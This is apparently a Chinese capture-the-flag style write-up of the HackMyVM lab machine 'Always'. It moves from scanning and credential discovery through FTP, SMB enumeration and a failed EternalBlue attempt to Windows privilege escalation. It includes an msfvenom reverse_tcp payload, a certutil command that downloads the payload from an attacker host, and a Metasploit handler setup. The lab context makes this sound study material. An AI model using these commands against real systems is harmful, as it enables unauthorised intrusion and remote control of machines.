HackMyVm-Always :简单

7.1 信息打点

nmap -sS -p- -T4 10.10.10.161 -A

图片[1]-HackMyVm-Always :简单-泷羽Sec

使用目录扫描出来一个admin后台界面

图片[2]-HackMyVm-Always :简单-泷羽Sec

查看源码发现账号密码信息

图片[3]-HackMyVm-Always :简单-泷羽Sec

登录进来发现一个base编码

图片[4]-HackMyVm-Always :简单-泷羽Sec

解密

ftpuser:KeepGoingBro!!!

图片[5]-HackMyVm-Always :简单-泷羽Sec

7.2 登录FTP

使用刚刚的账号密码登录

ftp 10.10.10.161

图片[6]-HackMyVm-Always :简单-泷羽Sec

发现了一个robots.txt,使用下面的命令将它下载下来

get robots.txt

图片[7]-HackMyVm-Always :简单-泷羽Sec

查看这个robots.txt中的文件

图片[8]-HackMyVm-Always :简单-泷羽Sec

管理员的秘密笔记
1)禁用防火墙和 Windows Defender。
2)启用 FTP 和 SSH。
3)启动 Apache 服务器。
4)别忘了更改用户“always”的密码。当前密码是“WW91Q2FudEZpbmRNZS4hLiE=”。

又得到一个密码

always:YouCantFindMe.!.!

图片[9]-HackMyVm-Always :简单-泷羽Sec

7.3 远程登录

图片[10]-HackMyVm-Always :简单-泷羽Sec

发现密码不对,我们来使用hydra来爆破rdp协议

图片[11]-HackMyVm-Always :简单-泷羽Sec

使用enum4linux枚举,看到支持的smb协议,为1.0和2.0/2.1,3.0以上均不支持,让我联想到了永痕之蓝漏洞(MS17-010)

enum4linux-ng -A 10.10.10.161 -C

图片[12]-HackMyVm-Always :简单-泷羽Sec

含义:-A 是 --all 的缩写,表示执行全量信息收集,包含以下枚举内容:

  • 主机基础信息(主机名、工作组 / 域、MAC 地址);
  • SMB 协议支持情况(支持的 SMB 版本、签名配置);
  • 用户和组列表(本地用户、域用户、内置组等);
  • 共享目录(可访问的 SMB 共享及权限);
  • 操作系统版本(通过 RPC 或 SMB 信息推断);
  • 服务、打印机、系统策略等其他信息。

7.4 永痕之蓝

利用,很遗憾利用失败

图片[13]-HackMyVm-Always :简单-泷羽Sec

利用nxc枚举这两个账号密码

always:YouCantFindMe.!.!
ftpuser:KeepGoingBro!!!

图片[14]-HackMyVm-Always :简单-泷羽Sec

看到ftpuser用户,尝试登录,也不让远程登录

图片[15]-HackMyVm-Always :简单-泷羽Sec

7.5 近源攻击

这里没找到其他方法,直接登录靶机上传shell吧(近源攻击),这里还需要注意,就是需要修改一下语言为美国的,不然登录不进去

图片[16]-HackMyVm-Always :简单-泷羽Sec

7.6 Msf获取反向shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.137 LPORT=4444 -f exe -o shell.exe
certutil -urlcache -split -f http://10.10.10.137:8000/shell.exe c:\1.exe

图片[17]-HackMyVm-Always :简单-泷羽Sec

msf上线

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.10.137
set lport 4444
run

图片[18]-HackMyVm-Always :简单-泷羽Sec

7.6 MSF内核漏扫

use multi/recon/local_exploit_suggester

图片[19]-HackMyVm-Always :简单-泷羽Sec

使用第一个模块,设置第一个会话,并进行提权

图片[20]-HackMyVm-Always :简单-泷羽Sec

##

往期推荐

全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细

HackMyVm-DC04 :简单

HackMyVm-DC03 :简单

HackMyVm-DC02 :简单

HackMyVm-DC01 :简单

HackMyVm-TriplAdvisor :简单

HackMyVm-Runas :简单

HackMyVm-Always :简单

HackMyVm-Nessus :简单

HackMyVm-Liar :简单

HackMyVm-Simple :简单

HackMyVm-Simple :简单

HackMyVm-Zero :简单

HackMyVm-OMG :简单

新版BurpSuite v2025.6.3汉化版,附激活教程

Fine!2025最新款信息收集综合工具

若依Vue漏洞检测工具v7更新

最好用的下一代目录爆破工具,全方位的目录爆破

集成MemProcFS,Vol2和Vol3的内存取证神器

重大更新!FeatherScan v4.5 内网 linux 信息收集,提权一键梭哈神器

x-waf,一个基于fuzz的waf绕过渗透工具

这10款内网穿透工具,一定有你没用过的

红队命令速查手册

挖SRC必须知道的25个漏洞提交平台

挖SRC必须知道的25个漏洞提交平台

FeatherScan v4.0 – 一款Linux内网全自动信息收集工具

掩日-适用于红队的综合免杀工具

2025最新渗透测试靶场推荐

近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等

【内网渗透】隐藏通信隧道技术

内网渗透必备,microsocks,一个轻量级的socks代理工具

神器分享 红队快速打点工具-DarKnuclei

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路

【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏

【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!

一个永久的渗透知识库

【oscp】vulnerable_docker,三种代理方法打入内网

【内网渗透】CobaltStrike与MSF联动互相上线的方式

内网渗透必备,microsocks,一个轻量级的socks代理工具

【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!

DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程

【渗透测试】12种rbash逃逸方式总结

红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路

红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学

不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学

ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略

sql注入中各种waf的绕过方式,狗,盾,神,锁,宝

利用MySQL特性,WAF绕过技巧

SQL注入绕过某狗的waf防火墙,这一篇就够了,6k文案超详细

大型翻车现场,十种waf绕过姿势,仅成功一种

喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透

本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!
THE END
喜欢就支持一下吧
点赞8 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片快捷回复

    暂无评论内容